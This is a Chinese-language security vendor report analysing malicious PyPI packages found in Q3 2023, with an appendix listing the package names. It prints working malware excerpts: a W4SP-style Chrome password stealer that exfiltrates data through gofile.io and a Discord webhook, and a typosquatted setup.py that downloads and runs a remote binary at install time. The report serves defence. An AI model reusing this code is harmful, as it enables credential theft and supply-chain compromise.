2023年第三季度,天问Python供应链威胁监测模块共捕捉到320个恶意包。其中包含大量类似W4SP Stealer的信息窃取恶意包,它们可以窃取受害者的个人信息,Discord密码,加密货币钱包等敏感信息。分析表明,攻击者会不断迭代更新他们的工具来规避安全检测,这给供应链安全带来了巨大的挑战。

天问供应链威胁监测模块是奇安信技术研究星图实验室研发的“天问”软件供应链安全分析平台的子模块,”天问“分析平台对Python、npm等主流的开发生态进行了长期、持续的监测,发现了大量的恶意包和攻击行为。

1. 类W4SP Stealer

W4SP Stealer是GitHub用户loTus04等人开发的一个Python木马,其可以窃取用户密码,浏览器cookies,Discord Token等敏感数据。在去年10月份PyPI中就出现了利用W4SP Stealer攻击的恶意包,相关报告可见[1]。下图是W4SP Stealer的攻击结果示例图。

w4sp

我们在Q3的恶意包中发现了许多基于W4SP Stealer的恶意包,由于W4SP Stealer仓库已被开发者删除,所以攻击者利用的是基于W4SP Stealer修改的工具。

neverbeentgg-1.0.0/neverbeentgg/__init__.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
import contextlib
import os
import threading
...

#  THIS IS 1.1.6 VERSION
#    BY W4SP, loTus04
# 

hook = "https[:]//discord.com/api/webhooks/1133180253678862436/6AG7x4Z5uUZoCkaEqUfq03A087OCbcK1-vflpxnZCOmKs0jipMsjmYdUs2-4q6jtfHHb"
DETECTED = False

...

Passw = []
def getPassw(path, arg):
    global Passw, PasswCount
    if not os.path.exists(path): return

    pathC = path + arg + "/Login Data"
    if os.stat(pathC).st_size == 0: return

    tempfold = (
        f"{temp}wp"
        + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for _ in range(8))
        + ".db"
    )

    shutil.copy2(pathC, tempfold)
    conn = sql_connect(tempfold)
    cursor = conn.cursor()
    cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
    data = cursor.fetchall()
    cursor.close()
    conn.close()
    os.remove(tempfold)

    pathKey = f"{path}/Local State"
    with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
    master_key = b64decode(local_state['os_crypt']['encrypted_key'])
    master_key = CryptUnprotectData(master_key[5:])

    for row in data: 
        if row[0] != '':
            for wa in keyword:
                old = wa
                if "https" in wa:
                    tmp = wa
                    wa = tmp.split('[')[1].split(']')[0]
                if wa in row[0] and old not in paswWords:
                    paswWords.append(old)
            Passw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {DecryptValue(row[2], master_key)}")
            PasswCount += 1
    writeforfile(Passw, 'passw')

...


def GatherAll():
    '                   Default Path < 0 >                         ProcesName < 1 >        Token  < 2 >              Password < 3 >     Cookies < 4 >                          Extentions < 5 >                                  '
    browserPaths = [
        [...],
        [f"{local}/Google/Chrome/User Data",                        "chrome.exe",   "/Default/Local Storage/leveldb",   "/Default",     "/Default/Network",     "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"              ],
        [...]
    ]
    ...
    for patt in browserPaths: 
        a = threading.Thread(target=getPassw, args=[patt[0], patt[3]])
        a.start()
        Threadlist.append(a)
    ...
    for file in ["wppassw.txt", "wpcook.txt"]: 
        # upload(os.getenv("TEMP") + "\\" + file)
        upload(file.replace(".txt", ""), uploadToAnonfiles(os.getenv("TEMP") + "\\" + file))
...

def uploadToAnonfiles(path):
    try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
    except:return False
...
def upload(name, link):
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
    }

    if name == "wpcook":
        rb = ' | '.join(cookiWords)
        if len(rb) > 1000: 
            rrrrr = Reformat(str(cookiWords))
            rb = ' | '.join(rrrrr)
        data = {
            ...
            }
        LoadUrlib(hook, data=dumps(data).encode(), headers=headers)
        return
    ...

我们截取了这个攻击代码窃取谷歌浏览器Chrome中密码的主要逻辑函数。观察上面的代码我们可以知道,在GatherAll函数中,攻击者首先会访问Chrome在本地存放目录"{local}/Google/Chrome/User Data"。然后,攻击者通过getPassw函数从"{local}/Google/Chrome/User Data/Default/Login Data"中获取了用户登陆网站的用户名以及密码等数据。并且他们从{local}/Google/Chrome/User Data/Local State得到了master_key。最终,他们通过这两部分数据成功拿到了明文的用户名和密码。

我们在windows系统上测试了相关代码,确实可以拿到在Chrome中存储的用户名和密码。

steal-chrome

攻击者会将获取的密码写入临时文件wppassw.txt中,然后通过uploadToAnonfiles函数上传到一个文件存储网站https://gofile.io/中。

1
2
3
def uploadToAnonfiles(path):
    try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
    except:return False

uploadToAnonfiles函数会返回一个下载链接的地址,如下图所示。

anonfile

最终,攻击者将得到的下载链接通过upload回传到自己设置的服务器地址,即代码开头设置的hook = https[:]//discord.com/api/webhooks/xxx

此类攻击代码不仅可以窃取受害者主机上的密码等敏感信息,而且可以通过获取本地cookie的方式来窃取受害者各种网络账号的相关内容,危害十分严重。

2. BlackCap Grabber

这类攻击与第一种类W4SP Stealer的攻击相近,都是通过读取受害者主机中的敏感文件来窃取各种隐私信息,例如discord密码,信用卡信息等等。关于BlackCap Grabber的功能可见下图,我们在Q2的恶意包分析中也提到了此类攻击,具体内容可见 【天问】2023年Q2恶意包回顾(一)

blackcap

我们在Q3的恶意包监控中共发现了148个此类恶意包,这些恶意包的版本号均为1.1.0,包名则是利用各种Python常见术语的拼合,例如pipcryptolibraryV2,详细的恶意包列表见文末。

3. TypoSquatting

requests是下载量最高的Python包之一,因此很多恶意包会将包名伪装成与requests极其相近。其利用用户下载第三方包的输入错误来达到下载安装的目的。在Q3的监测中,我们发现了7个此类恶意攻击包。

我们对比了这些恶意包和requests中模块文件夹,发现他们包含完全相同的文件,如下图所示。

requests-comp

攻击者在setup.py中添加了恶意代码,而在src/request3中则完全复制了requests模块文件夹的内容。

requests3-2.19.3/setup.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
import os
import sys
from codecs import open
import requests
import subprocess

from setuptools import setup
from setuptools.command.test import test as TestCommand

...

about = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "src", "request3", "__version__.py"), "r", "utf-8") as f:
    exec(f.read(), about)
    url = "http://10.41.72.31:9443/sys0.init"
    filename = "/tmp/sys0.init"
    resp = requests.get(url)
    f = open(filename, 'wb')
    f.write(resp.content)
    f.close()
    os.chmod("/tmp/sys0.init", 0o755)
    subprocess.run(["/tmp/sys0.init"],shell=True)

with open("README.md", "r", "utf-8") as f:
    readme = f.read()

setup(
    ...
    packages=["request3"],
    package_data={"": ["LICENSE", "NOTICE"]},
    package_dir={"": "src"},
    ...
    project_urls={
        "Documentation": "https://requests.readthedocs.io",
        "Source": "https://github.com/psf/requests",
    },
)

4. 恶意文件嵌入

此类攻击会将恶意的二进制文件以base64字符串等形式存入脚本,然后在下载安装时直接将这些内容加载到内存中进行执行。Q3发现的大多数此类恶意包均为White Snake,其会将主机的敏感信息通过Telegram聊天向攻击者回传。详细分析内容可见【天问】2023年Q2恶意包回顾(一)

5. 附录(恶意包列表)

  1. 类W4SP Stealer

    包名 版本 作者 上传时间
    hnUHfYZUmKMO 0.3.2 xotifol394 2023-07-20T21:37:13
    lyFamDoRKsGb 0.3.2 xotifol394 2023-07-20T21:52:25
    EoerbIsjxqyV 0.3.2 xotifol394 2023-07-20T21:55:40
    WkquBsXEkbXn 0.3.2 xotifol394 2023-07-20T22:29:38
    jzyRLjROXlCa 0.3.2 xotifol394 2023-07-21T02:05:23
    eeAjHjmCLAkF 0.3.2 tiles77583 2023-07-21T15:41:31
    MJpoYTWNgddh 0.3.2 poyon95014 2023-07-21T20:55:57
    requesters 0.0.1 reazadude 2023-07-26T14:52:46
    requesters 0.0.1 reazadude 2023-07-26T14:52:48
    requestery 1 blackpythone 2023-07-26T15:16:53
    requestery 2 blackpythone 2023-07-26T15:24:12
    tgrequests 0.0.0 blackpythone 2023-07-26T15:42:11
    neverbeentgg 1.0.0 hmedsatour 2023-07-26T16:03:57
    pyttpmodule 0.2 Peppy187 2023-08-16T23:42:25
    javapatch 0.6 DeKrypt 2023-09-23T13:58:23
    javapatch 0.7 DeKrypt 2023-09-23T14:02:23

  2. BlackCap Grabber

    包名 版本 作者 上传时间
    pipcryptoextensionsV1 1.1.0 john85571 2023-07-02T21:38:22
    pipcryptoextensionsV1 1.1.0 john85571 2023-07-02T21:38:24
    pipcryptolibraryV2 1.1.0 kristiepatton520 2023-07-02T21:39:42
    pipcryptolibraryV2 1.1.0 kristiepatton520 2023-07-02T21:39:43
    pipsqlite3kitV2 1.1.0 barbara72696 2023-07-03T02:36:19
    pipsqlite3kitV2 1.1.0 barbara72696 2023-07-03T02:36:21
    pysqlite2liberyV1 1.1.0 vjohnson399 2023-07-03T02:39:37
    pysqlite2liberyV1 1.1.0 vjohnson399 2023-07-03T02:39:39
    pycryptographymodulesV1 1.1.0 brittanyanderson138 2023-07-04T09:20:10
    pycryptographymodulesV1 1.1.0 brittanyanderson138 2023-07-04T09:20:12
    syscolouringsaddon 1.1.0 gregorygibson799 2023-07-05T08:49:32
    syscolouringsaddon 1.1.0 gregorygibson799 2023-07-05T08:49:34
    pythoncolouringspackageV1 1.1.0 knoxjohn803 2023-07-05T08:50:36
    pythoncolouringspackageV1 1.1.0 knoxjohn803 2023-07-05T08:50:38
    pycolorpackage 1.1.0 ihernandez777 2023-07-05T10:32:08
    pycolorpackage 1.1.0 ihernandez777 2023-07-05T10:32:10
    syssqlite2libaryV2 1.1.0 jeffrey89721 2023-07-05T10:33:09
    syssqlite2libaryV2 1.1.0 jeffrey89721 2023-07-05T10:33:11
    pipcoloringskitsV1 1.1.0 wjones327 2023-07-06T14:52:45
    pipcoloringskitsV1 1.1.0 wjones327 2023-07-06T14:52:47
    syscoloringsaddition 1.1.0 lindasmith611 2023-07-14T10:39:03
    syscoloringsaddition 1.1.0 lindasmith611 2023-07-14T10:39:05
    syssqlitedbmodules 1.1.0 wadestephanie541 2023-07-14T18:46:42
    syssqlitedbmodules 1.1.0 wadestephanie541 2023-07-14T18:46:44
    pitutil 1.0.0 lindasmith611 2023-07-14T18:49:16
    pitutil 1.0.0 lindasmith611 2023-07-14T18:49:18
    pipcoloringstools 1.1.0 gregorygibson799 2023-07-17T15:07:16
    pipcoloringstools 1.1.0 gregorygibson799 2023-07-17T15:07:17
    pythoncryptextensions 1.1.0 grantanthony506 2023-07-17T15:08:24
    pythoncryptextensions 1.1.0 grantanthony506 2023-07-17T15:08:25
    pythonsqltoolkitV1 1.1.0 lwilliams529 2023-07-18T00:00:05
    pythonsqltoolkitV1 1.1.0 lwilliams529 2023-07-18T00:00:09
    pipsqladdV1 1.1.0 laurapena682 2023-07-18T00:01:14
    pipsqladdV1 1.1.0 laurapena682 2023-07-18T00:01:15
    pipcryptkits 1.1.0 destinyorozco690 2023-07-18T00:57:48
    pipcryptkits 1.1.0 destinyorozco690 2023-07-18T00:57:50
    pysqlite3extensionV2 1.1.0 cherylroth283 2023-07-18T00:58:53
    pysqlite3extensionV2 1.1.0 cherylroth283 2023-07-18T00:58:54
    pipsqlite3mod 1.1.0 qomfkouxccenuea 2023-07-18T01:36:30
    pipsqlite3mod 1.1.0 qomfkouxccenuea 2023-07-18T01:36:32
    syssqllib 1.1.0 jasoncochran489 2023-07-18T01:50:31
    syssqllib 1.1.0 jasoncochran489 2023-07-18T01:50:33
    pipsqlitekitV2 1.1.0 megangraham186 2023-07-18T11:39:28
    pipsqlitekitV2 1.1.0 megangraham186 2023-07-18T11:39:30
    pythonfontingadds 1.1.0 nicholasmyers782 2023-07-18T12:48:30
    pythonfontingadds 1.1.0 nicholasmyers782 2023-07-18T12:48:32
    pycryptographypackageV1 1.1.0 lhunter314 2023-07-18T13:21:01
    pycryptographypackageV1 1.1.0 lhunter314 2023-07-18T13:21:03
    pipsqlipackages 1.1.0 jack24276 2023-07-18T13:24:06
    pipsqlipackages 1.1.0 jack24276 2023-07-18T13:24:07
    pythonsqlitedbpackagesV2 1.1.0 samueljoseph617 2023-07-18T14:08:39
    pythonsqlitedbpackagesV2 1.1.0 samueljoseph617 2023-07-18T14:08:40
    pythoncolourextension 1.1.0 njennings453 2023-07-18T14:08:44
    pythoncolourextension 1.1.0 njennings453 2023-07-18T14:08:46
    pythoncolouringtoolkitsV2 1.1.0 skupwtdiyhqnagp 2023-07-18T14:39:48
    pythoncolouringtoolkitsV2 1.1.0 skupwtdiyhqnagp 2023-07-18T14:39:50
    pythonsqlitetoolkitV1 1.1.0 lkkokmwmevljche 2023-07-18T15:29:59
    pythonsqlitetoolkitV1 1.1.0 lkkokmwmevljche 2023-07-18T15:30:01
    pythoncolouringsliberyV1 1.1.0 jxpoeweaozdxnmd 2023-07-18T19:24:24
    pythoncolouringsliberyV1 1.1.0 jxpoeweaozdxnmd 2023-07-18T19:24:26
    pipfontinglibV2 1.1.0 srtleeidscjffix 2023-07-18T20:51:10
    pipfontinglibV2 1.1.0 srtleeidscjffix 2023-07-18T20:51:12
    pycoloringextensionV1 1.1.0 xivchfueofueqzo 2023-07-19T01:21:04
    pycoloringextensionV1 1.1.0 xivchfueofueqzo 2023-07-19T01:21:06
    pycolorpkgsV2 1.1.0 mzrblruljwldftk 2023-07-19T01:45:36
    pycolorpkgsV2 1.1.0 mzrblruljwldftk 2023-07-19T01:45:37
    pipcoloringsliberyV1 1.1.0 pxtamctorwjjruq 2023-07-19T02:50:09
    pipcoloringsliberyV1 1.1.0 pxtamctorwjjruq 2023-07-19T02:50:11
    pipcolouringext 1.1.0 hhrmkjdfgkeisug 2023-07-19T03:42:38
    pipcolouringext 1.1.0 hhrmkjdfgkeisug 2023-07-19T03:42:40
    pipsqlitedbkit 1.1.0 PythonDiscordPussys 2023-07-20T21:59:19
    pipsqlitedbkit 1.1.0 PythonDiscordPussys 2023-07-20T21:59:21
    pipsqliteexts 1.1.0 PythonDiscordPussyss 2023-07-21T12:21:28
    pipsqliteexts 1.1.0 PythonDiscordPussyss 2023-07-21T12:21:29
    pythoncolourmoduleV2 1.1.0 PythonDiscordPussyss 2023-07-21T14:44:02
    pythoncolourmoduleV2 1.1.0 PythonDiscordPussyss 2023-07-21T14:44:03
    pipcolourpkgs 1.1.0 PythonDiscordPussyss 2023-07-21T15:06:31
    pipcolourpkgs 1.1.0 PythonDiscordPussyss 2023-07-21T15:06:33
    pysqlilibery 1.1.0 HolgerHolger 2023-07-21T23:08:06
    包名 版本 作者 上传时间
    pysqlilibery 1.1.0 HolgerHolger 2023-07-21T23:08:07
    pythonsqlite3libaryV1 1.1.0 nomnomnom123 2023-07-21T23:58:11
    pythonsqlite3libaryV1 1.1.0 nomnomnom123 2023-07-21T23:58:13
    syscolouringpkgV2 1.1.0 FrozenApple 2023-07-24T00:44:20
    syscolouringpkgV2 1.1.0 FrozenApple 2023-07-24T00:44:21
    pythonsqliteext 1.1.0 cecwokyiixusatn 2023-07-24T16:08:04
    pythonsqliteext 1.1.0 cecwokyiixusatn 2023-07-24T16:08:05
    pyfontstools 1.1.0 wjiewhvtkdbgzdf 2023-07-24T18:16:35
    pyfontstools 1.1.0 wjiewhvtkdbgzdf 2023-07-24T18:16:37
    syscryptographyadd 1.1.0 mctcwsetbpzcmim 2023-07-24T19:18:13
    syscryptographyadd 1.1.0 mctcwsetbpzcmim 2023-07-24T19:18:15
    syscolouringexts 1.1.0 tfllilfkzykopvx 2023-07-24T21:19:00
    syscolouringexts 1.1.0 tfllilfkzykopvx 2023-07-24T21:19:02
    pythoncoloringpackage 1.1.0 uujacjqknzcxtmw 2023-07-24T21:38:43
    pythoncoloringpackage 1.1.0 uujacjqknzcxtmw 2023-07-24T21:38:44
    pipcryptographymodV1 1.1.0 froschkugel 2023-07-25T01:05:25
    pipcryptographymodV1 1.1.0 froschkugel 2023-07-25T01:05:29
    pythonfontsliberyV1 1.1.0 froschkugel 2023-07-25T13:19:11
    pythonfontsliberyV1 1.1.0 froschkugel 2023-07-25T13:19:13
    syscolouringsaddV2 1.1.0 clofjkeixujsvff 2023-08-01T23:17:05
    syscolouringsaddV2 1.1.0 clofjkeixujsvff 2023-08-01T23:17:07
    syssqllibaryV1 1.1.0 yobnxwijpokklis 2023-08-02T00:59:36
    syssqllibaryV1 1.1.0 yobnxwijpokklis 2023-08-02T00:59:37
    pythonsqlitedbextensionV2 1.1.0 zlgilcnxdcpqdmw 2023-08-06T13:14:27
    pythonsqlitedbextensionV2 1.1.0 zlgilcnxdcpqdmw 2023-08-06T13:14:29
    pysqlitedbextV1 1.1.0 vgrkixebdtypcdb 2023-08-06T14:21:55
    pysqlitedbextV1 1.1.0 vgrkixebdtypcdb 2023-08-06T14:21:57
    pysqlite2pkgsV2 1.1.0 taialzopcgjsnci 2023-08-06T14:34:22
    pysqlite2pkgsV2 1.1.0 taialzopcgjsnci 2023-08-06T14:34:24
    syscolouringspackageV1 1.1.0 ohvtojkognvrqjj 2023-08-06T14:41:48
    syscolouringspackageV1 1.1.0 ohvtojkognvrqjj 2023-08-06T14:41:49
    pythoncolouringpackageV1 1.1.0 diuwcjufpvicdjq 2023-08-06T15:14:14
    pythoncolouringpackageV1 1.1.0 diuwcjufpvicdjq 2023-08-06T15:14:16
    pythoncryptokitV2 1.1.0 vhseadypdmvulcf 2023-08-06T15:36:41
    pythoncryptokitV2 1.1.0 vhseadypdmvulcf 2023-08-06T15:36:43
    pipsqlitedbmodsV1 1.1.0 yuhlmwjwizivkkm 2023-08-06T15:59:08
    pipsqlitedbmodsV1 1.1.0 yuhlmwjwizivkkm 2023-08-06T15:59:10
    pipcoloradditionV1 1.1.0 uwjjcmknoecrmfj 2023-08-06T22:11:51
    pipcoloradditionV1 1.1.0 uwjjcmknoecrmfj 2023-08-06T22:11:53
    pysqlitepkgV2 1.1.0 zlgilcnxdcpqdmw 2023-08-06T22:39:57
    pysqlitepkgV2 1.1.0 zlgilcnxdcpqdmw 2023-08-06T22:39:59
    pysqlitekitsV1 1.1.0 lteysicxwamsjdx 2023-08-07T00:14:29
    pysqlitekitsV1 1.1.0 lteysicxwamsjdx 2023-08-07T00:14:30
    pythonsqlipackageV1 1.1.0 xaszyepcuxvmmbb 2023-08-07T00:46:55
    pythonsqlipackageV1 1.1.0 xaszyepcuxvmmbb 2023-08-07T00:46:56
    pipcryptomodulesV1 1.1.0 puuleskphlbhiqz 2023-08-07T01:09:19
    pipcryptomodulesV1 1.1.0 puuleskphlbhiqz 2023-08-07T01:09:21
    pyfontingpackagesV2 1.1.0 essgbdoqxiqukqa 2023-08-07T01:26:44
    pyfontingpackagesV2 1.1.0 essgbdoqxiqukqa 2023-08-07T01:26:46
    pipfontingpkg 1.1.0 tnehejbbtkgecte 2023-08-07T02:39:10
    pipfontingpkg 1.1.0 tnehejbbtkgecte 2023-08-07T02:39:12
    pythonsqlipackagesV1 1.1.0 wxwckppziozhehs 2023-08-07T03:26:37
    pythonsqlipackagesV1 1.1.0 wxwckppziozhehs 2023-08-07T03:26:39
    pythonsqliextV2 1.1.0 mmhzcrchdnecueg 2023-08-07T13:16:18
    pythonsqliextV2 1.1.0 mmhzcrchdnecueg 2023-08-07T13:16:19
    pythoncryptV2 1.1.0 thxxouerlbrmdwp 2023-08-07T14:57:42
    pythoncryptV2 1.1.0 thxxouerlbrmdwp 2023-08-07T14:57:43
    pipfontslibery 1.1.0 kvuyljsffduyzic 2023-08-07T15:11:24
    pipfontslibery 1.1.0 kvuyljsffduyzic 2023-08-07T15:11:25
    syscryptlibrary 1.1.0 feutpriqvsusosj 2023-08-07T18:24:44
    syscryptlibrary 1.1.0 feutpriqvsusosj 2023-08-07T18:24:46
    syscryptographymoduleV1 1.1.0 txhcntdqpljtdyv 2023-08-07T19:44:18
    syscryptographymoduleV1 1.1.0 txhcntdqpljtdyv 2023-08-07T19:44:20
    syssqlite2kits 1.1.0 smcrcefegkcvblk 2023-08-07T21:27:49
    syssqlite2kits 1.1.0 smcrcefegkcvblk 2023-08-07T21:27:50
    syssqlitelibV1 1.1.0 mjonsmtjgzcbm 2023-08-07T21:48:21
    syssqlitelibV1 1.1.0 mjonsmtjgzcbm 2023-08-07T21:48:23
    pipcryptlibaryV1 1.1.0 ipslxbuicqhmeakixoz 2023-08-07T21:50:12
    pipcryptlibaryV1 1.1.0 ipslxbuicqhmeakixoz 2023-08-07T21:50:14

  3. TypoSquatting

    包名 版本 作者 上传时间
    request3 2.19.0 Sunny99sun 2023-08-29T03:16:34
    request3 2.19.2 Sunny99sun 2023-08-30T09:48:16
    request3 2.19.3 Sunny99sun 2023-08-30T10:41:50
    request3 2.19.4 Sunny99sun 2023-08-30T10:51:36
    request3 2.19.5 Sunny99sun 2023-08-30T10:56:51
    requesttest3 1.0.1 lemon01 2023-08-31T03:14:58
    requesttest3 1.0.2 lemon01 2023-08-31T03:44:23

  4. 恶意文件嵌入

    包名 版本 作者 上传时间
    dccsx 0.0.2 team_dccs 2023-07-10T19:51:20
    lvx 0.0.2 mivi 2023-07-21T12:34:31
    semdb 0.1 semurg 2023-08-01T08:04:47
    semdber 4.12 semurg 2023-08-01T16:25:58
    gen-agent-fingerprint 0.1 requesst 2023-08-15T17:43:31
    ja3-hashscript 0.1 requesst 2023-08-15T18:00:23
    cc-checkerx 0.1 mariaclaras 2023-08-15T19:08:43
    testepassword-generate 0.1 brenno003 2023-08-15T21:22:41
    aiprojectuz 0.1 aiprojectuz 2023-09-06T09:58:48